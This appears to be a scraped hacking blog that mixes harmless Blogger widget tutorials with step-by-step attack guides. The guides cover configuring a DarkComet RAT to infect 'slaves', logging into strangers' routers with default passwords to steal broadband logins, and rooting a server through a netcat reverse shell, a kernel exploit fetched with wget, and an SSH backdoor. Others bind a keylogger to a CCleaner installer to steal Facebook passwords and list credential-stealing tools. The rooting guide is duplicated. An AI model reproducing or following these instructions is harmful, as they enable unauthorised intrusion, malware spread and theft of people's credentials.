Darkcomet Tutorial SET-UP ( complete with pictures ) [VERY EASY]
I am AnGeL , so I hope you will like it and sorry if my englsh is not fine , i am pakistani^^
So let's go ...
I will explain to you how to configure and how to use darkcomet RAT
Request :
- You need a NO-IP account or DynDNS account :
http://www.no-ip.com/
http://dyn.com/dns/
-You need to open the default darkcomet port 1604 on your router and your firewall
-And of course you also need , darkcomet RAT available on offcial website :
http://www.darkcomet-rat.com/
I will not explain how to portforwarding and how to create a NO-IP account , lots of tutorials are alredy available on HF.net :)
So , now everything is ok , we have our NO-IP account ( tested with hackforum.no-ip.org xD) , port 1604 is open so , we have to open the client :
For this tutorial , i choose Darrkcomet 4.2 FWB ( last version ) but it is the same for all versions
How to create a Darkcomet server ?
-The client looks like that :
Now you have to click on " edit server" like the picture :
- You will see this window :
- Security Password : enter here a password if you think it is usefull , but it is not important
]2- Process Mutex : click 5 or 6 times on " generate "
3- Server ID : it will be the name of the servers in your client ( i write " HF.net" for this tutorial =
4- Profile name : put here your profile name :)
5- Hijacking / Firewall Bypass : Don't check this option , you don't need it :)
Now we have to configure the "network settings " , like this pic :
1- Enter Your NO-IP or DynDNS adress ( hackforum.no-ip.org for this test )
2 -Select the port to listen , 1604 is the default port of darkcomet
3- Click on " add this configuration "
Now we will check out the "module start-up settings" ...
No need to do anything , activating the start-up from your crypter is much better ..!
Then , you have the possibility to send a message to your victim when your server has been exectuted :
Send a message like an error or a dll or OCX missing files or a non compatibility problem ...
Don't send like me , "hackforum.net , the biggest hacking community " ... xD
Now , let's see on the "Module shield settings "
Here I don't activate anything , because i activate start-up and persistence from my crypter , it is more powerfull like that xD
Now we have to enter the keylogger settings , you will have 2 options :
1- Online keylogging ( I choose this option )
2- Sending logs on a ftp ( i you choose this option , you will have to enter your ftp informations )
It's almost finish , your server is now configurate ...
You have some more options like icone changing or files binder , but you will have to crypt yourserver when it will be created , so , once again , it will be much better to add files and icones from your crypter .
So now , we just have to go on " build module " to create our server :
1- Compression settings : let it disable , it depend of your crypter
2 -Save profile :Check it to save your profile settings
3 - Build server : just click on the "Build server" button to create your darkcomet server xD
Now you have got your operatingserver , just need to cypt it and spread it and after a moment you will see this :
Darkcomet advertises you for a new connection ! ;)
be sure with that (simple ) configuration and a good crypting , a lot of slaves will appears in your client...:yeye:
So my first tutorial on HF is now , finished , I hope you like it , and hope it help some of us too to configure their darkcomet servers .
I try to did my best with english language , i hope it was good enough ...
Tutorials like this one on each RAT will be posted soon ...
Hack Any One's Mobile Phone And Receive Victom's Message
1. First Dwonload This App.
2. Install This App. in Victoms Mobile (If Victoms Mobile Support .jad .jar Then You Have Chances For Hack)
3. Then Enter You Number
4. Now You Will Receive Victom's Messages
Click Here To Download App. (Its Format is jad,Jar)
How To Speed Up Torrents with Low Seeders
This summary is not available. Please
click here to view the post.
Add The Facebook Like Button Below Blog Post Title
Facebook has introduced the Like Button for bloggers. The readers can share the post from the blog directly to their Facebook profile by clicking on Like Button available on the blog. This way people can know what their friends are reading and it can attract new readers. So in other word we can say it is the best tool to increase your blog traffic.
Add The Facebook Like Button Below Post Title
- Go to Blogger > Desings > Edit Html
- Click "Expand Widget Templates" option (Before putting the code Back Up Your Template~Learn How To Back Up Template)
- To add the button directly below the post title find the below code.(Click Ctrl and F for a Search bar to help to find the code)
<div class='post-header-line-1'/>
- Now paste the Facebook Button Code given below directly Below <div class='post-header-liner1'/>
<iframe src="//www.facebook.com/plugins/likebox.php?href=http%3A%2F%2Fwww.facebook.com%2Fpages%2F%D1%A6%CE%B7%E1%B8%A0eL-r%CE%B5%CF%89-hacKs%2F373654062702525&width=270&height=290&colorscheme=dark&show_faces=true&border_color&stream=false&header=true" scrolling="no" frameborder="0" style="border:none; overflow:hidden; width:270px; height:290px;" allowtransparency="true"></iframe>
- Save your Template and check out your Like Button below post title.
Add Back To Top Button On Your Blog
Add Back To Top Button On Your Blog
Today
I am sharing a simple tutor for blogger. If you have a long content on
your blog page then this Back To Top button can help the visitors very
much. When visitors click on this button they will be redirect to the
top of the page. It helps to save the time of the visitors. It is very
easy to install on your blog . It will install the button on the right
side of the bottom of the page. You simply need to add a simple html
code for this. But first see demo.
Add Back To Top Button On Your Blog
- Go to Blogger>Design>Page Element
- Click Add a Gadget option
- Select HTML/JavaScript option. Copy and paste the below code inside it.
<!--Back to top Start http://angelcrewhacks.blogspot.com/--><a alt="Back to Top" style="display:scroll;position:fixed;bottom:25px;right:5px;" href="#" title="Back to Top"><img onmouseover="this.src='https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjLLR67Mlj3u6UwlyhfnxB4h1BNO-B_eGkjr0VgFQJrqu9q9UxxJbQ55X56j_rzL3fkmFG6m_MYpmtdvN2qVsee8-mNoj1WeHCVhHugJyYyhlKSLaylGPyZL8f6YOd8ePxfhXLr3ieQ3WU/s1600/go_to_top.png'" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjYK8HGCqGe3rNrNQJVc3ERrqp-PfTdQOdqaD1hEr10O9slKh11nCRh1o_IgeGdOl8RlQ-bhLFfhLw4QTYjWWF8RpVWukIU36Yme7if8_PSUwOrztoTaxU12pC1qc2Nus1Dpazc3fLlkGY/s1600/go_to_top_small.png" onmouseout="this.src='https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjYK8HGCqGe3rNrNQJVc3ERrqp-PfTdQOdqaD1hEr10O9slKh11nCRh1o_IgeGdOl8RlQ-bhLFfhLw4QTYjWWF8RpVWukIU36Yme7if8_PSUwOrztoTaxU12pC1qc2Nus1Dpazc3fLlkGY/s1600/go_to_top_small.png'" /></a><!--BACK2TOP-IMAGE-STOPS-->
<!--Back to top End http://angelcrewhacks.blogspot.com/-->
Note:
You can change "Back To Top" with your desire Title.
- Hit Save button and your are done .
Add Floating Facebook Badge On Your Blog
As you know Facebook is the No.1 social networking site in today world. Facebook had provide blogger different plugins like Like Button, Like Box
etc to share their blog post on Facebook which helps blogger to
increase their blog traffic. Today I am going to share steps to add
floating Facebook badge on your blog.But before that we have also
published post about adding floating twitter button on the blog. If you have missed it check it out. So let's start the process step by step but first see demo:
Add Floating Facebook Badge On Your Blog
- Go to Blogger>Design>Page Element
- Click Add a Gadget option
- Select HTML/JavaScript option and paste the below code inside it.
<br/><a style="display:scroll;position:fixed;bottom:450px;right:1px;" href="http://www.facebook.com/profile.php?id=100000625447798" target="_blank"><img style="border:0;" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEghrNAa2HrYqga0NAeA4NU_Z69RqfUibNs9E4-J5JbHr388c10aI1TQmXWtURIz5PAPdJ9Gmf1JHgAA9NvMUByARTURg0nP6wL9xylwToQ7fu_UBdsMwMWi5GEtaKan0yJDC59-n2Ruz5Q/s1600/facebook_badge.png" /></a>
Note:
Replace gulmiresunga with your Facebook Fan Page or Facebook Username.Add Simple Subscription Box Below Post In Blogger Adding subscription box below blog post can helps to increase the subscriber of your blog. Whenever readers reads your post, if they like the article they can easily subscribe to your blog if you provide the subscription box below blog post. You just... Read full post - Add Simple Subscription Box Below Post In Blogger Posted by Santu 0 Comments 2 Reactions Add Beautiful Search Box On Your Blog
Add Beautiful Search Box On Your Blog
I
am sharing you the beautiful and good looking search box that you can
add on your blog.You just simply need to add the html code on your blog
provided below.
Add Search Box On Your Blog
- Go to Blogger>Design>Page Element
- Click Add a Gadget option
- Select HTML/JavaScript option. Copy Search Box Code from below and paste that code in it.
<style type="text/css"> #searchbox{background:url(https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi6kHKcaIMPRsMe4weCx6VMhVGUs8v36b2b7aVsTsWeegUZFTwymD73bUu0N0r6aiZrje91p4X3B-J1E0FkkFM6iLHlXNPNu5w06Q7a4ArwHpMPXM7S0er43IvtW3xEchljzgpdFl3OfIc/s1600/Beautiful+Search+Boxes.png) no-repeat scroll center center transparent;width:307px;height:50px;disaply:block;} form#searchform{display: block;padding: 12px;margin:0;} form#searchform #s{padding: 6px 6px 6px 26px;margin:0;width: 215px;font-size:14px;vertical-align: top;border:none;background:transparent;} form#searchform #sbutton{margin:0;padding:0;height:30px;width:30px;vertical-align: top;border:none;background:transparent;} </style> <div id="searchbox"> <form id="searchform" action="/search" method="get"> <input type="text" id="s" name="q" value=""/> <input type="image" src="http://img1.blogblog.com/img/blank.gif" id="sbutton" /> </form> </div>
- Save the Gadget.
Add A Flying Twitter Bird On Your Blog
Twitter is gaining popularity day by day. Daily millions are using twitter and generating millions of tweet daily. Twitter for
the blog has been the must necessary application for generating
traffic, sharing post of your blog. This flying twitter bird lets user
to tweet your blog which helps to generate the traffic. It fly from
corner to corner as you scroll up or down.
Add A Flying Twitter Bird
- Go to Blogger>Design>Edit HTML
- Check Expand Widget Templates . I recommend you to Backup Your Template.
- Then Find for </body> and immediately above that code paste the below code.
<script src='http://bloggerblogwidgets.googlecode.com/files/way2blogging.org-tripleflap.js' type='text/javascript'></script><script type='text/javascript'>var twitterAccount = "theangelcrew";var tweetThisText = " <data:blog.pageTitle/> : <data:blog.url/> ";tripleflapInit();</script>
- Replace shahsantosh with your twitter username name
- Save Template and your are done
Add Free SMS Widget On Your Blog
Most of you may want to add free SMS widget on your blog. So for them SlideSMS is providing the free SMS widget for your blog. You just need to add a code on your blog and any one can send free SMS via your blog. But the drawback of this widget is it comes with the Google Ads, Facebook like button
and the link of the Slide SMS. Because of these it looks a bit ugly.
But it can be good widget for the beginner blogger who want to put
free SMS widget on your blog.So lets add Free SMS widget on your blog.I
will show you to add it on both blogger older interface and blogger
newer interface.
Add Free SMS Widget On Your Blog
- First go to SlideSMS
- Then Copy the code provided there.
For Oder Blogger Interface: How To Add?
- Go to Blogger>Design>Page Element
- Click Add a Gadget option
- Select HTML/JavaScript option. Paste that code that you copied before in it.
- Save the Gadget.
For New Blogger Interface: How To Add?
Add Alert Message Box On Blogger Blogs
Add Alert Message Box On Blogger Blogs
In
this tutorial I will show you how to add alert message box on blogger
blogs. This message box can be used to add a alert message for the
visitors before they visit your blog.When someone visit your blog first
this message box will appear and after that only they can visit your
blog.You can write like some copyright information or other message on
this box. To add this box on the blog you simply need to add one line
code on your blog. So lets start:
Add Alert Message Box On Blogger
- For Older Blogger Interface : Go to Blogger > Design >Edit HTML>Expand Widget Template .
- For Newer Blogger Interface : Go to Blogger>Template>Edit HTML>Proceed>Expand Widget Template.
- Then search (CTRL+F) for <head> and add the below code just below it.
<!-- GulmiResunga.com Alert Message Box Start --><script type="text/javascript"> alert("Your Message Here"); </script>
<!-- GulmiResunga.com Alert Message Box End -->
- Replace Your Message Here with the message you want to show while someone visit your blog.
Hack Your Broadband (No Risk)
Step 1: Download any port Scanner (i preffer Super Scan or IPscanner)
Step 2: First Get your ip from
CODE www.whatismyip.com
Asume your IP to be 59.x.x.17
Step 3: copy your ip in IPscanner Software and scan for alive IPs in the below range
start:59.x.x.1 to End:59.x.x.255
Step 4: Then check in your scanner which alive IPs has the port 80 open
Step 5: Enter that alive IP in your web browser
Step 6: It asks for user , pass
Type u
User=admin
Password=admin or password
It is the default password for most of the routers.
if denied then use on another alive IP
Step 7: If success then it will show router settings page of tht IP user
There goto Home -> Wan Setting and the username and password of his account will appear there.
Step 8: use ShowPassword or Revelation software to view the password in asterisks
Now You have Username/Password
Enjoy!
Step 2: First Get your ip from
CODE www.whatismyip.com
Asume your IP to be 59.x.x.17
Step 3: copy your ip in IPscanner Software and scan for alive IPs in the below range
start:59.x.x.1 to End:59.x.x.255
Step 4: Then check in your scanner which alive IPs has the port 80 open
Step 5: Enter that alive IP in your web browser
Step 6: It asks for user , pass
Type u
User=admin
Password=admin or password
It is the default password for most of the routers.
if denied then use on another alive IP
Step 7: If success then it will show router settings page of tht IP user
There goto Home -> Wan Setting and the username and password of his account will appear there.
Step 8: use ShowPassword or Revelation software to view the password in asterisks
Now You have Username/Password
Enjoy!
Rooting a server
Rooting a server :
what is rooting ?
Getting admin access to the target remote system is called rooting.
Tools required
1 “Shell Upload”
2:- “Exploit”
3:- “Log Cleaner
4:- “SSH Backdoor”
5:- “netCat”
6:- “Putty”
7:- “Brain”
GOOGLE WILL HELP TO FIND ALL THINGS ESCAPE “ BRAIN “ LOOOL
>> First of all back connect the servers
open the cmd prompt and run the netcat.
Example :
if u saved netcat in C:// Drive then
Cd C:/
Cd netcat
Cd Netcat.exe
>> Now come to the shell
Open the asp Shell in browser and click on backconnection in shell.
Then write your IP address in IP Bar and Enter the port number 2121.
And then click on connect.
Using this now you have connected your shell with server.now you can give command to the server.
>> now open the netcat window through cmd prompt and give command
Code :
==============
Nc -| -v –p 2121
==============
Then output of this command will become like this
c:\netcat>nc -l -v -p 2121
Listning On 2121
Note:
you can use any open port , it’s your choice J
2: Exploit
Now we have to find a right exploit so go to asp shell and type there this command.
code:
===============
#Uname –a
===============
Now press the Enter and you will see like this
[admin@www.target.com /home/saijyoti/public_html/cgi-bin]$ uname -a
Linux dualxeon09.ns5.999servers.com 2.6.34-194.26.1.el5 #1 SMP Tue 2011 x86_64 x86_64 x86_64 GNU/Linux
Now you can see version of server that’s kernel 2.6.34 and year 2011 for example.
Now we have to find 2.6.34 2011 Exploit. We can find it at Google or any hacking fouram.
Else J many official websites still exist lol
# Leetupload.com
# Exploit-db.com
# Packetstormsecurity.org
# Th3-0utl4ws.com
>> Using Of Exploit
How to execute exploit at server side
We have saved exploit in C: drive or root drive now we have to upload it via shell then compile it then execute. But first we have to go in TMP directory of the shell because Tmp is always writeable directory.
Well type the one of them command in shell
Code :
======================================
Cd /home/websiteusername/public_html/tmp
or
Cd /home/websiteusername/public_html/admin/tmp
or
Cd /home/websiteusername/public_html/image/tmp
=======================================
Note:
you can find tmp dir in your way.
>> Now we have to execute exploit at server side.
Code :
Wget http:// exploitwebsite.com/2011-exploits/exploitname.c
code:
======================================
http:// exploitwebsite.com/2011-exploits/exploitname.c
======================================
here you have to write the website from where you can download or get the exploit . after this command screen will look like..
code :
======================================
admin@www.target.com /home/target_username/public_html/tmp]$ wgethttp://exploitwebsite.com/2011-exploits/exploitname.c
–2011-09-22 05:12:14—http://exploitwebsite.com/2011-exploits/exploitname.c
Resolving exploitwebsite.com…199.58.192.192
Connecting to exploitwebsite.com|199.58.192.192|:80…connected.
HTTP request sent, awaiting response…200 OK
Length: 16003(15K) [text/x-csrc]
Saving to: ‘exploitname.c’
======================================
Note:
199.58.192.192 IT’s your IP address
exploit has been saved at server side using shell J ok , now we have to set the permission of the exploit to 777.
go to cmd prompt and type
code:
======================================
Chmod 777 ExploitName.c
======================================
Now exploit is under full control at server side now we have to compile and execute the exploit.
Type commands..
Code:
======================================
gcc –o Exploit Exploitname.c
======================================
It will compile and save . now for executing the exploit type command..
Code :
======================================
./exploit
======================================
Then server will tell us that we have got root or not ? lool
For checking type command..
code:
======================================
Whoami
======================================
It will answer you ‘root’ that will look like this….
uid=xxx(root) gid=xx(root) groups=xxx(root)
Now type this command for full control
code:
======================================
su
======================================
Ok Done!
3: SSH Backdoor
>> now for installing backdoor give command….
Code:
======================================
#Wget http://www.urlofbackdoor.com/sshdoor.zip
======================================
>> For unzip sshdoor.zip , give command..
code:
======================================
#Unzip sshdoor.zip
======================================
>> After extraction give command..
code:
======================================
cd sshdoor
======================================
>> Then give command
Code :
======================================
./run yourpass port
======================================
Note:
At the place of yourpass, you have to give your password and at the place of port , write the port number. Then open the putty and connect with that
>> Commands used for Backdoor Installing (Nutshell)
Code:
======================================
#Wget http://www.urlofbackdoor.com/sshdoor.zip
#Unzip sshdoor.zip
#cd sshdoor
./run Crazyxploit 21
======================================
Thats All
Note :
You can use following commands for executing exploits J
C exploit
———————-
gcc -o exploit exploit.c
chmod +x exploit
./exploit
———————-
Perl Exploits
—————
perl exploit.pl
—————
Python
——————
python exploit.py
——————
php
—————–
php exploit.php
—————–
zip
—————-
unzip exploit.zip
./run
—————-
===============================================
For any doubt contact : (AnGeL Crew)
===============================================
what is rooting ?
Getting admin access to the target remote system is called rooting.
Tools required
1 “Shell Upload”
2:- “Exploit”
3:- “Log Cleaner
4:- “SSH Backdoor”
5:- “netCat”
6:- “Putty”
7:- “Brain”
GOOGLE WILL HELP TO FIND ALL THINGS ESCAPE “ BRAIN “ LOOOL
>> First of all back connect the servers
open the cmd prompt and run the netcat.
Example :
if u saved netcat in C:// Drive then
Cd C:/
Cd netcat
Cd Netcat.exe
>> Now come to the shell
Open the asp Shell in browser and click on backconnection in shell.
Then write your IP address in IP Bar and Enter the port number 2121.
And then click on connect.
Using this now you have connected your shell with server.now you can give command to the server.
>> now open the netcat window through cmd prompt and give command
Code :
==============
Nc -| -v –p 2121
==============
Then output of this command will become like this
c:\netcat>nc -l -v -p 2121
Listning On 2121
Note:
you can use any open port , it’s your choice J
2: Exploit
Now we have to find a right exploit so go to asp shell and type there this command.
code:
===============
#Uname –a
===============
Now press the Enter and you will see like this
[admin@www.target.com /home/saijyoti/public_html/cgi-bin]$ uname -a
Linux dualxeon09.ns5.999servers.com 2.6.34-194.26.1.el5 #1 SMP Tue 2011 x86_64 x86_64 x86_64 GNU/Linux
Now you can see version of server that’s kernel 2.6.34 and year 2011 for example.
Now we have to find 2.6.34 2011 Exploit. We can find it at Google or any hacking fouram.
Else J many official websites still exist lol
# Leetupload.com
# Exploit-db.com
# Packetstormsecurity.org
# Th3-0utl4ws.com
>> Using Of Exploit
How to execute exploit at server side
We have saved exploit in C: drive or root drive now we have to upload it via shell then compile it then execute. But first we have to go in TMP directory of the shell because Tmp is always writeable directory.
Well type the one of them command in shell
Code :
======================================
Cd /home/websiteusername/public_html/tmp
or
Cd /home/websiteusername/public_html/admin/tmp
or
Cd /home/websiteusername/public_html/image/tmp
=======================================
Note:
you can find tmp dir in your way.
>> Now we have to execute exploit at server side.
Code :
Wget http:// exploitwebsite.com/2011-exploits/exploitname.c
code:
======================================
http:// exploitwebsite.com/2011-exploits/exploitname.c
======================================
here you have to write the website from where you can download or get the exploit . after this command screen will look like..
code :
======================================
admin@www.target.com /home/target_username/public_html/tmp]$ wgethttp://exploitwebsite.com/2011-exploits/exploitname.c
–2011-09-22 05:12:14—http://exploitwebsite.com/2011-exploits/exploitname.c
Resolving exploitwebsite.com…199.58.192.192
Connecting to exploitwebsite.com|199.58.192.192|:80…connected.
HTTP request sent, awaiting response…200 OK
Length: 16003(15K) [text/x-csrc]
Saving to: ‘exploitname.c’
======================================
Note:
199.58.192.192 IT’s your IP address
exploit has been saved at server side using shell J ok , now we have to set the permission of the exploit to 777.
go to cmd prompt and type
code:
======================================
Chmod 777 ExploitName.c
======================================
Now exploit is under full control at server side now we have to compile and execute the exploit.
Type commands..
Code:
======================================
gcc –o Exploit Exploitname.c
======================================
It will compile and save . now for executing the exploit type command..
Code :
======================================
./exploit
======================================
Then server will tell us that we have got root or not ? lool
For checking type command..
code:
======================================
Whoami
======================================
It will answer you ‘root’ that will look like this….
uid=xxx(root) gid=xx(root) groups=xxx(root)
Now type this command for full control
code:
======================================
su
======================================
Ok Done!
3: SSH Backdoor
>> now for installing backdoor give command….
Code:
======================================
#Wget http://www.urlofbackdoor.com/sshdoor.zip
======================================
>> For unzip sshdoor.zip , give command..
code:
======================================
#Unzip sshdoor.zip
======================================
>> After extraction give command..
code:
======================================
cd sshdoor
======================================
>> Then give command
Code :
======================================
./run yourpass port
======================================
Note:
At the place of yourpass, you have to give your password and at the place of port , write the port number. Then open the putty and connect with that
>> Commands used for Backdoor Installing (Nutshell)
Code:
======================================
#Wget http://www.urlofbackdoor.com/sshdoor.zip
#Unzip sshdoor.zip
#cd sshdoor
./run Crazyxploit 21
======================================
Thats All
Note :
You can use following commands for executing exploits J
C exploit
———————-
gcc -o exploit exploit.c
chmod +x exploit
./exploit
———————-
Perl Exploits
—————
perl exploit.pl
—————
Python
——————
python exploit.py
——————
php
—————–
php exploit.php
—————–
zip
—————-
unzip exploit.zip
./run
—————-
===============================================
For any doubt contact : (AnGeL Crew)
===============================================
Hack facebook password remotely
Hacking Facebook account is very easy and just requires not more than 10 minutes of work. Don't worry i will also tell you how to protect your facebook account or passwords from such hacks and hackers. But for this you must know how hackers hack your facebook account. So first i teach you how to hack facebook account remotely and then i will tell how to protect yourself from this.
So guys lets start hacking Facebook account or passwords....
Steps to hack Facebook account using Keylogger:
1. Creating the Keylogger Server to hack Facebook passwords.
2. Extracting the Icon from installer.
3. Bind the keylogger server with any software setup.
4. How to spread your keylogger or send it to your friends to hack their Facebook accounts or passwords.
Step 1. Creating the Keylogger Server
1. Download the keylogger.
2. Extract the file, Now you will get two folders:
a. First one contains Keylogger and Binder
b. Second Contains resource hacker tool.( to extract the icons from installers).
3. Now open the Keylogger. It contains two files one for gmail email and other for password. For this create one test account on Gmail and enter it's details in this.
4. After entering email and password. Set the time interval usually set 3 mins i.e. after how much time you want to receive logs from the user.
5. Now click on send verification mail. This mail is to test that your keylogger is working correctly or not.
6. After you click this you will receive a confirmation mail on test account which will confirm that keylogger is working.
7. Now click on generate to set the mutex (any secret key to make your keylogger FUD) and then click on compile server.
8. Now save the file to desktop or any other location of your choice. Now your server is ready but it can be easily detected.
Step 2.: Extracting the Icon file from any installer(resource hacker)
1. Open the Resource hacker folder and open the reshacker file.
2. Now go to its menu and open any setup file. Suppose we want to attach our keylogger toCcleaner setup file. So open the Ccleaner setup with resource hacker.
3. Now in menu there is one action button click on it and then click save all resources.
4. Now save all the resources to desktop or any other location of your choice.
5. It consists of two files one is icon file and other is res file . We only need icon file, so you can delete the other file i.e res file.
6. Now we have Icon of installer file(as discussed above Ccleaner setup Icon).
Step 3: Bind the Keylogger server with any software
1. Now Go to keylogger folder and open the Binder.
2. Now Click on + button given below to add files.
3. Now add the keylogger server and the set up of software (i.e. in our case it's Ccleaner setup).
4. Now in menu of Binder, Go to Settings. There select the icon that we have generated in the previous step and set the location of output file as shown in figure.
5. Now again go to File's menu in Binder and click on Bind files.
6. Now your Binded keylogger is ready. Now you have to spread it or send it to the slave that is your friend.
Step4 : How to Spread Keylogger or send it to slave or friend
1. Now you have one Software setup file with keylogger attached with it.(In our case we have Ccleaner setup with keylogger attached with it.
2. Now Spread your keylogger through forums. You might be a member of various forums use them to spread your keylogger in form of software posts. You can use various software's to spread them that users frequently download.
3. Spread it through pendrives or USB hard drives. Suppose a friend asked you for a software give it the software that has keylogger attached with it.
Note: you can also attach keylogger with images also. But that can be detectable by antivirus. So avoid such type of hacking.
So isn't that so easy to hack anyone's Facebook account in just few minutes.
How to protect yourself from these hacks?
Prevention is always better than cure so always follow these steps:
1. Don't use cracked softwares and don't download them from unauthorized websites.
2. Always keep your antivirus and anti-spyware up to date.
3. Always scan the files before transferring them to your USB.
4. Do not allow other users to use your PC i.e password protect it.
85 Best ever Collection of Hacking tools
Here we Go descr :
hkSFV 2.0.1.rar 213.15 KB
sign.exe 2.68 MB
Fake Login Screens &Pages.pg 252.97 KB
Hotmail Hacking Pg 2.pg 296.41 KB
Hotmail Hacking.pg 296.73 KB
Msn Fun Tools.pg 325.43 KB
Other Hacking Tools Pg 2.pg 165.99 KB
Other Hacking Tools.pg 340.38 KB
Yahoo Hacking.pg 195 KB
autorun.exe 787.68 KB
autorun.ico 21.96 KB
autorun.inf 47 B
autorun.tgt 2.01 MB
AOLKicker V.1.0.0.zip 20.7 KB
Anti - Bomb.exe 98.19 KB
B-S_Spy.zip 158.49 KB
EmoticonsCreator11.exe 101.13 KB
Fake Login Hotmail.zip 219.03 KB
Fake MSN Messenger Version 5.0.rar 55.94 KB
Fake_Hotmail_Login_Screen.zip 11.37 KB
Give me your pass v1.0.rar 49.32 KB
Hack Hotmail Evolution Pro v2.92.rar 107.87 KB
Hack MSN Password.rar 198.03 KB
Head Fuck Hotmail Hack.rar 446.73 KB
HoTMaiL_Hacker.exe 80.11 KB
HotFreeze 1.6.exe 671.14 KB
Hotmail Brute.rar 413.52 KB
Hotmail Hacker GOLD.rar 11.21 KB
Hotmail Killer 2.exe 391.69 KB
FAQs.html 2.18 KB
HotmailHack.exe 154.62 KB
MSWINSCK.OCX 105.8 KB
RICHTX32.OCX 198.8 KB
ReadMe.txt 257 B
HotmailHacker_XEdition.rar 601.89 KB
MSN Locker.exe 97.14 KB
aamd532.dll 10.5 KB
locker.exe.manifest 1.36 KB
MSN Bomberman v3.1.2.exe 123.61 KB
MSN Flooder.rar 217.12 KB
MSN Hacker DUC.rar 223.86 KB
MSN Password Finder v2.0.exe 123.18 KB
MSN Spy Lite v1.0.rar 405.92 KB
MSWINSCK.OCX 105.8 KB
Msn messanger.exe 98.18 KB
MSN passwords.rar 135.28 KB
MSN.Chat.Monitor.and.Sniffer.v3.2.Incl.Keygen.rar 1.16 MB
MSN.Sniffer.1.2.+.Crack.rar 938.93 KB
MSN7UniversalPatcherPlusPlus.exe 136.68 KB
MSNCPECrawler.exe 201.13 KB
MSNPasswordRetriever.exe 325.11 KB
MSNblockcheck.exe 79.17 KB
MSNclean.exe 241.63 KB
Magic Password-15-SE.rar 50.3 KB
Msn Auto Responder.exe 83.63 KB
Msn Detector 2.0.exe 124.64 KB
Msn Dondurucu.exe 560.6 KB
Msn Fake 7.rar 58.48 KB
Needed files.rar 3.87 MB
Lanzador1.5.exe 278.62 KB
cygcrypto-0.9.7.dll 848 KB
cygssl-0.9.7.dll 176 KB
cygwin1.dll 948.32 KB
nukemsn.exe 77.61 KB
nukemsn.exe.stackdump 772 B
Proyect Lithium Version 0.2.0.exe 633.18 KB
S_H_Yahoo_Pass_Sender.exe 439.67 KB
readme.txt 834 B
Saria Fake Logins 2.0.rar 1.83 MB
TrayIt!.exe 120.62 KB
trayit!.dll 6.5 KB
Ultimate Nickpopupz 2004 v0.4.exe 168.13 KB
XP Killer.rar 145.24 KB
XP-Killer.rar 145.37 KB
YAHOO Password stealer.exe 119.62 KB
CBomber.exe 94.17 KB
KewlButtonz.ocx 96 KB
YMSG12ENCRYPT.dll 88 KB
Yacam.exe 87.64 KB
YahooHack!.rar 2.64 MB
Readme.txt 657 B
Yahoo Password Retrieval.exe 132.64 KB
cokluoturum.exe 73.6 KB
fake webpages.zip 54.79 KB
fake_webpages_1.rar 17.43 KB
fakeypager.zip 261.33 KB
fmsn.zip 74.64 KB
freeze.exe 76.13 KB
BluesPortScan.exe 309.17 KB
Cable Modem Sniffer.exe 124.19 KB
DOMSCAN.EXE 78.11 KB
FTP Brute Forcer.exe 146.15 KB
FTP_Program_Password_Hacker.exe 167.11 KB
FastResolver.exe 98.12 KB
HooK-TooLbOx.exe 120.13 KB
NetBIOS Name Scanner.exe 148.15 KB
NetResView.exe 110.68 KB
Msinet.ocx 113.2 KB
PHPBB DEFACER.exe 180.69 KB
PORTSAGE.EXE 96.19 KB
Port Listener XP.exe 101.15 KB
PortScan.exe 73.63 KB
SQL Inject.exe 76.13 KB
Help.PNG 1.25 KB
Help.htm 4.6 KB
S-H Client.exe 948.17 KB
S-H Create Server.exe 576.14 KB
SniffPass.exe 103.61 KB
ipscan.exe 174.68 KB
netpass.exe 106.17 KB
phpBBAttacker.exe 82.19 KB
***.exe 317.62 KB
Slave.exe 138.15 KB
caliber.nfo 529 B
readme.txt 6.07 KB
tmg.nfo 11.79 KB
tmgra364.exe 90.63 KB
uninstall_slave.exe 86.1 KB
vendor.txt 2.98 KB
whoistd.exe 106.63 KB
www2ip.exe 537.64 KB
hotmailfullversion.rar 124.97 KB
hotmailhack.rar 11.88 KB
kitle.exe 253.1 KB
msnpassgrab.exe 74.67 KB
mspass.exe 109.13 KB
sean paul - TEMPERATURE.mp3 4.18 MB
skinnerv12setup.exe 1.41 MB
yahoocrack.exe
keylogging lets Hack The Target
Step 1: Get a keylogger
There are many great keyloggers out there, however my favorite is Project Neptune and I will be using it for examples and designing my presentation around the settings Project Neptune provides. It has a very helpful user friendly interface and is very reliable in my, very narrow and premature, opinion. Link
Now I have nothing against any other keyloggers and, as much as it shames me, have not tried any other keyloggers. Any should work, although Project Neptune comes with a binder which is very helpful and I'm not sure that many other keyloggers do (but I could be wrong).
Step 2: Setting up the keylogger
-Settings 1 * Keylogging-
For Project Neptune you have 2 options for reviving the logs of you slave. Email is pretty basic; however depending on how well you spread your keylogger, you might notice your mailbox getting a little too full. FTP stands for File Transfer Protocol, a method of transferring files over the internet (hence the name Tongue). To do this you'll need an FTP client. I never got into FTP so I just stuck with email.
Next you get to choose the intervals that you receive logs at. I highly advise you do not go less than 20 minutes. Your mailbox will become painstakingly cluttered (especially if your slave somehow sets up the keylogger multiple times on their computer) with anything less. When you get multiple people keylogged you will thank me for this.
Logging the text on the clip board is also very handy. You might notice in your logs that the user typed "[ctrl] v [/ctrl]". Whenever you see that, go up to the clip board and that is what should be in place of the sequence.
Logging the user's specs is not necessary. However, I like to check out how much RAM people have. It humors me to see people with only 1 gig of RAM or on the contrary with 40 or so but with only a 2GHz processor. But that's just because I'm extra creepy. Wink
Email settings can be confusing. I recomend making a gmail account just because Project Neptune provides the SMTP sending server and port. It is possible to use a yahoo/hotmail/live/comcast/whatever email but you need to provide your own SMTP information; which I couldn't get to work to save my life. Most email service's SMTP info can be found via search engine. The rest is self explanatory. THE EMAIL TO SEND AND RECEIVE KEYLOGS BOTH BELONG TO YOU! I know it sounds dumb but I thought one of them had to be my slave's email. It is not. Please don't tell me how dumb I was, because I already know.
Unless you are using an FTP server, you can leave the FTP settings blank. Here's an example of my settings:
[/img]http://i1088.photobucket.com/albums/i336/nck0099/Keylogging.jpg[/img]
-Settings 2 * System Wide-
